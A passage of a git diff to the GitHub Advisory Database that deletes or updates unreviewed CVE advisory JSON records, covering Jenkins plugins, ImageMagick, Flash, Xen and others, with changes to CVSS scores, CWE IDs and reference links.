"GHSA-xgc2-q928-27wv", - "modified": "2022-05-17T01:55:53Z", - "published": "2022-05-17T01:55:53Z", - "aliases": [ - "CVE-2010-5104" - ], - "details": "The escapeStrForLike method in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 does not properly escape input when the MySQL database is set to sql_mode NO_BACKSLASH_ESCAPES, which allows remote attackers to obtain sensitive information via wildcard characters in a LIKE query.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5104" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64185" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/35770" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/05/12/5" - }, - { - "type": "WEB", - "url": "http://www.osvdb.org/70116" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/45470" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2012-05-21T20:55:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json b/advisories/unreviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json deleted file mode 100644 index d96456a765a35..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xgmh-rvpw-6498/GHSA-xgmh-rvpw-6498.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xgmh-rvpw-6498", - "modified": "2022-05-14T03:33:40Z", - "published": "2022-05-14T03:33:40Z", - "aliases": [ - "CVE-2018-1000108" - ], - "details": "A cross-site scripting vulnerability exists in Jenkins CppNCSS Plugin 1.1 and earlier in AbstractProjectAction/index.jelly that allow an attacker to craft links to Jenkins URLs that run arbitrary JavaScript in the user's browser when accessed.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000108" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-712" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-03-13T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xhjj-jg7j-pqrx/GHSA-xhjj-jg7j-pqrx.json b/advisories/unreviewed/2022/05/GHSA-xhjj-jg7j-pqrx/GHSA-xhjj-jg7j-pqrx.json index cf2da312a48ad..7eee8055d22de 100644 --- a/advisories/unreviewed/2022/05/GHSA-xhjj-jg7j-pqrx/GHSA-xhjj-jg7j-pqrx.json +++ b/advisories/unreviewed/2022/05/GHSA-xhjj-jg7j-pqrx/GHSA-xhjj-jg7j-pqrx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xhjj-jg7j-pqrx", - "modified": "2022-05-01T18:29:00Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-01T18:29:00Z", "aliases": [ "CVE-2007-4988" ], "details": "Sign extension error in the ReadDIBImage function in ImageMagick before 6.3.5-9 allows context-dependent attackers to execute arbitrary code via a crafted width value in an image file, which triggers an integer overflow and a heap-based buffer overflow.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -121,7 +124,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-681" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-xhq8-8cqj-q337/GHSA-xhq8-8cqj-q337.json b/advisories/unreviewed/2022/05/GHSA-xhq8-8cqj-q337/GHSA-xhq8-8cqj-q337.json index b26252b616123..e1bccbbc3c697 100644 --- a/advisories/unreviewed/2022/05/GHSA-xhq8-8cqj-q337/GHSA-xhq8-8cqj-q337.json +++ b/advisories/unreviewed/2022/05/GHSA-xhq8-8cqj-q337/GHSA-xhq8-8cqj-q337.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-xhq8-8cqj-q337", - "modified": "2022-05-14T02:15:15Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-14T02:15:15Z", "aliases": [ "CVE-2011-0611" ], "details": "Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android; Adobe AIR before 2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a \"group of included constants,\" object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -121,7 +124,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-843" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json b/advisories/unreviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json deleted file mode 100644 index 60d8367b54b1a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xj4w-r6gr-x5qm/GHSA-xj4w-r6gr-x5qm.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xj4w-r6gr-x5qm", - "modified": "2023-02-23T03:30:16Z", - "published": "2022-05-24T22:00:44Z", - "aliases": [ - "CVE-2019-10407" - ], - "details": "Jenkins Project Inheritance Plugin 2.0.0 and earlier displayed a list of environment variables passed to a build without masking sensitive variables contributed by the Mask Passwords Plugin.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10407" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-351" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-09-25T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json b/advisories/unreviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json deleted file mode 100644 index 8c3308ff61d9d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xj63-95xc-jc4v/GHSA-xj63-95xc-jc4v.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xj63-95xc-jc4v", - "modified": "2023-10-25T18:31:24Z", - "published": "2022-05-24T16:52:46Z", - "aliases": [ - "CVE-2019-10385" - ], - "details": "Jenkins eggPlant Plugin 2.2 and earlier stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10385" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1430" - }, - { - "type": "WEB", - "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-834/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-08-07T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json b/advisories/unreviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json deleted file mode 100644 index d6944c9800da5..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xp44-8vwr-xwmv/GHSA-xp44-8vwr-xwmv.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xp44-8vwr-xwmv", - "modified": "2023-03-01T03:30:29Z", - "published": "2022-05-24T22:00:44Z", - "aliases": [ - "CVE-2019-10428" - ], - "details": "Jenkins Aqua Security Scanner Plugin 3.0.17 and earlier transmitted configured credentials in plain text as part of the global Jenkins configuration form, potentially resulting in their exposure.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10428" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1508" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-319" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-09-25T16:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json b/advisories/unreviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json deleted file mode 100644 index fc2eec0bf5402..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xr3x-62qw-vc4w", - "modified": "2023-02-10T18:30:30Z", - "published": "2022-05-24T17:24:21Z", - "aliases": [ - "CVE-2020-11110" - ], - "details": "Grafana through 6.7.1 allows stored XSS.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11110" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md" - }, - { - "type": "WEB", - "url": "https://security.netapp.com/advisory/ntap-20200810-0002/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-07-27T13:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json b/advisories/unreviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json deleted file mode 100644 index dabfbdd53a08a..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json +++ /dev/null @@ -1,51 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-xv6x-43gq-4hfj", - "modified": "2022-05-02T03:40:08Z", - "published": "2022-05-02T03:40:08Z", - "aliases": [ - "CVE-2009-2940" - ], - "details": "The pygresql module 3.8.1 and 4.0 for Python does not properly support the PQescapeStringConn function, which might allow remote attackers to leverage escaping issues involving multibyte character encodings.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2940" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37046" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37654" - }, - { - "type": "WEB", - "url": "http://ubuntu.com/usn/usn-870-1" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2009/dsa-1911" - }, - { - "type": "WEB", - "url": "http://www.osvdb.org/59028" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-10-22T16:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json b/advisories/unreviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json deleted file mode 100644 index 25313b70818e2..0000000000000 --- a/advisories/unreviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9394-xfq9-6qrp", - "modified": "2022-06-15T00:00:23Z", - "published": "2022-06-07T00:00:33Z", - "aliases": [ - "CVE-2022-28224" - ], - "details": "Clusters using Calico (version 3.22.1 and below), Calico Enterprise (version 3.12.0 and below), may be vulnerable to route hijacking with the floating IP feature. Due to insufficient validation, a privileged attacker may be able to set a floating IP annotation to a pod even if the feature is not enabled. This may allow the attacker to intercept and reroute traffic to their compromised pod.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28224" - }, - { - "type": "WEB", - "url": "https://www.tigera.io/security-bulletins-tta-2022-001/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-20" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2022-06-06T18:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/07/GHSA-4jqg-rxh9-h7mc/GHSA-4jqg-rxh9-h7mc.json b/advisories/unreviewed/2022/07/GHSA-4jqg-rxh9-h7mc/GHSA-4jqg-rxh9-h7mc.json index 6f2881fe6c19d..a902959c7920d 100644 --- a/advisories/unreviewed/2022/07/GHSA-4jqg-rxh9-h7mc/GHSA-4jqg-rxh9-h7mc.json +++ b/advisories/unreviewed/2022/07/GHSA-4jqg-rxh9-h7mc/GHSA-4jqg-rxh9-h7mc.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-385" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/07/GHSA-55c8-6r36-9g85/GHSA-55c8-6r36-9g85.json b/advisories/unreviewed/2022/07/GHSA-55c8-6r36-9g85/GHSA-55c8-6r36-9g85.json index 750822794fd35..89d8d850ffdeb 100644 --- a/advisories/unreviewed/2022/07/GHSA-55c8-6r36-9g85/GHSA-55c8-6r36-9g85.json +++ b/advisories/unreviewed/2022/07/GHSA-55c8-6r36-9g85/GHSA-55c8-6r36-9g85.json @@ -33,6 +33,14 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/D4RW5FCIYFNCQOEFJEUIRW3DGYW7CWBG/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M27MB3QFNIJV4EQQSXWARHP3OGX6CR6K/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D4RW5FCIYFNCQOEFJEUIRW3DGYW7CWBG/" @@ -41,6 +49,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M27MB3QFNIJV4EQQSXWARHP3OGX6CR6K/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221007-0007/" diff --git a/advisories/unreviewed/2022/07/GHSA-f3p5-98fc-2gxr/GHSA-f3p5-98fc-2gxr.json b/advisories/unreviewed/2022/07/GHSA-f3p5-98fc-2gxr/GHSA-f3p5-98fc-2gxr.json index 057ee17cbaf21..0f60903e32fee 100644 --- a/advisories/unreviewed/2022/07/GHSA-f3p5-98fc-2gxr/GHSA-f3p5-98fc-2gxr.json +++ b/advisories/unreviewed/2022/07/GHSA-f3p5-98fc-2gxr/GHSA-f3p5-98fc-2gxr.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00011.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MYI3OMJ7RIZNL3C6GUWNANNPEUUID6FM/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D4RW5FCIYFNCQOEFJEUIRW3DGYW7CWBG/" @@ -45,6 +49,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MYI3OMJ7RIZNL3C6GUWNANNPEUUID6FM/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1037" @@ -57,6 +65,10 @@ "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5207" }, + { + "type": "WEB", + "url": "https://www.secpod.com/blog/retbleed-intel-and-amd-processor-information-disclosure-vulnerability/" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/07/12/2" diff --git a/advisories/unreviewed/2022/07/GHSA-w7j2-r4x6-6frw/GHSA-w7j2-r4x6-6frw.json b/advisories/unreviewed/2022/07/GHSA-w7j2-r4x6-6frw/GHSA-w7j2-r4x6-6frw.json index cea67e9418fff..647dbbb2fb19a 100644 --- a/advisories/unreviewed/2022/07/GHSA-w7j2-r4x6-6frw/GHSA-w7j2-r4x6-6frw.json +++ b/advisories/unreviewed/2022/07/GHSA-w7j2-r4x6-6frw/GHSA-w7j2-r4x6-6frw.json @@ -21,6 +21,22 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23825" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/D4RW5FCIYFNCQOEFJEUIRW3DGYW7CWBG/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KLSRW4LLTAT3CZMOYVNTC7YIYGX3KLED/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M27MB3QFNIJV4EQQSXWARHP3OGX6CR6K/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MYI3OMJ7RIZNL3C6GUWNANNPEUUID6FM/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D4RW5FCIYFNCQOEFJEUIRW3DGYW7CWBG/" @@ -37,6 +53,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MYI3OMJ7RIZNL3C6GUWNANNPEUUID6FM/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1037" diff --git a/advisories/unreviewed/2022/08/GHSA-p9ch-h5p3-4xcq/GHSA-p9ch-h5p3-4xcq.json b/advisories/unreviewed/2022/08/GHSA-p9ch-h5p3-4xcq/GHSA-p9ch-h5p3-4xcq.json index 7193e1d4d38e2..ff2423b9af617 100644 --- a/advisories/unreviewed/2022/08/GHSA-p9ch-h5p3-4xcq/GHSA-p9ch-h5p3-4xcq.json +++ b/advisories/unreviewed/2022/08/GHSA-p9ch-h5p3-4xcq/GHSA-p9ch-h5p3-4xcq.json @@ -40,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-200" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/08/GHSA-wfvr-4p83-r8mf/GHSA-wfvr-4p83-r8mf.json b/advisories/unreviewed/2022/08/GHSA-wfvr-4p83-r8mf/GHSA-wfvr-4p83-r8mf.json index d8cbc628122fa..5f59faeb12434 100644 --- a/advisories/unreviewed/2022/08/GHSA-wfvr-4p83-r8mf/GHSA-wfvr-4p83-r8mf.json +++ b/advisories/unreviewed/2022/08/GHSA-wfvr-4p83-r8mf/GHSA-wfvr-4p83-r8mf.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://crbug.com/1323449" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/T4NMJURTG5RO3TGD7ZMIQ6Z4ZZ3SAVYE/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T4NMJURTG5RO3TGD7ZMIQ6Z4ZZ3SAVYE/" diff --git a/advisories/unreviewed/2022/09/GHSA-f6rj-qrpf-jc34/GHSA-f6rj-qrpf-jc34.json b/advisories/unreviewed/2022/09/GHSA-f6rj-qrpf-jc34/GHSA-f6rj-qrpf-jc34.json index d1f2be1e5e2f8..8ee2d8497c9b8 100644 --- a/advisories/unreviewed/2022/09/GHSA-f6rj-qrpf-jc34/GHSA-f6rj-qrpf-jc34.json +++ b/advisories/unreviewed/2022/09/GHSA-f6rj-qrpf-jc34/GHSA-f6rj-qrpf-jc34.json @@ -32,6 +32,22 @@ { "type": "WEB", "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=29536" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Feb/3" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/6" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/30/8" } ], "database_specific": { diff --git a/advisories/unreviewed/2022/10/GHSA-8vvp-2mv7-px5c/GHSA-8vvp-2mv7-px5c.json b/advisories/unreviewed/2022/10/GHSA-8vvp-2mv7-px5c/GHSA-8vvp-2mv7-px5c.json index 05d6bbd3bc499..21a98caeda554 100644 --- a/advisories/unreviewed/2022/10/GHSA-8vvp-2mv7-px5c/GHSA-8vvp-2mv7-px5c.json +++ b/advisories/unreviewed/2022/10/GHSA-8vvp-2mv7-px5c/GHSA-8vvp-2mv7-px5c.json @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://github.com/redis/redis/commit/0bf90d944313919eb8e63d3588bf63a367f020a3" }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.211962" + }, { "type": "WEB", "url": "https://vuldb.com/?id.211962" diff --git a/advisories/unreviewed/2022/10/GHSA-fqrh-w8r3-22q6/GHSA-fqrh-w8r3-22q6.json b/advisories/unreviewed/2022/10/GHSA-fqrh-w8r3-22q6/GHSA-fqrh-w8r3-22q6.json index 5af1aa35f9f0e..875259c22a95b 100644 --- a/advisories/unreviewed/2022/10/GHSA-fqrh-w8r3-22q6/GHSA-fqrh-w8r3-22q6.json +++ b/advisories/unreviewed/2022/10/GHSA-fqrh-w8r3-22q6/GHSA-fqrh-w8r3-22q6.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33748" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWSC77GS5NATI3TT7FMVPULUPXR635XQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" diff --git a/advisories/unreviewed/2022/10/GHSA-r55p-5rm2-vqg9/GHSA-r55p-5rm2-vqg9.json b/advisories/unreviewed/2022/10/GHSA-r55p-5rm2-vqg9/GHSA-r55p-5rm2-vqg9.json index e8778c126a1de..0bf7897e57a40 100644 --- a/advisories/unreviewed/2022/10/GHSA-r55p-5rm2-vqg9/GHSA-r55p-5rm2-vqg9.json +++ b/advisories/unreviewed/2022/10/GHSA-r55p-5rm2-vqg9/GHSA-r55p-5rm2-vqg9.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33746" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWSC77GS5NATI3TT7FMVPULUPXR635XQ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" @@ -33,6 +45,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YZVXG7OOOXCX6VIPEMLFDPIPUTFAYWPE/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5272" @@ -52,7 +68,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-404" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/10/GHSA-v88g-q782-jgp2/GHSA-v88g-q782-jgp2.json b/advisories/unreviewed/2022/10/GHSA-v88g-q782-jgp2/GHSA-v88g-q782-jgp2.json index 0bc0cadac2489..5db8dd75237c5 100644 --- a/advisories/unreviewed/2022/10/GHSA-v88g-q782-jgp2/GHSA-v88g-q782-jgp2.json +++ b/advisories/unreviewed/2022/10/GHSA-v88g-q782-jgp2/GHSA-v88g-q782-jgp2.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33749" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://xenbits.xenproject.org/xsa/advisory-413.txt" @@ -36,7 +40,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-400" + "CWE-400", + "CWE-770" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/10/GHSA-wp5g-757j-v342/GHSA-wp5g-757j-v342.json b/advisories/unreviewed/2022/10/GHSA-wp5g-757j-v342/GHSA-wp5g-757j-v342.json index a83d479d21656..7390d3b790d95 100644 --- a/advisories/unreviewed/2022/10/GHSA-wp5g-757j-v342/GHSA-wp5g-757j-v342.json +++ b/advisories/unreviewed/2022/10/GHSA-wp5g-757j-v342/GHSA-wp5g-757j-v342.json @@ -21,6 +21,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33747" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TJOMUNGW6VTK5CZZRLWLVVEOUPEQBRHI/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWSC77GS5NATI3TT7FMVPULUPXR635XQ/" + }, + { + "type": "WEB", + "url": 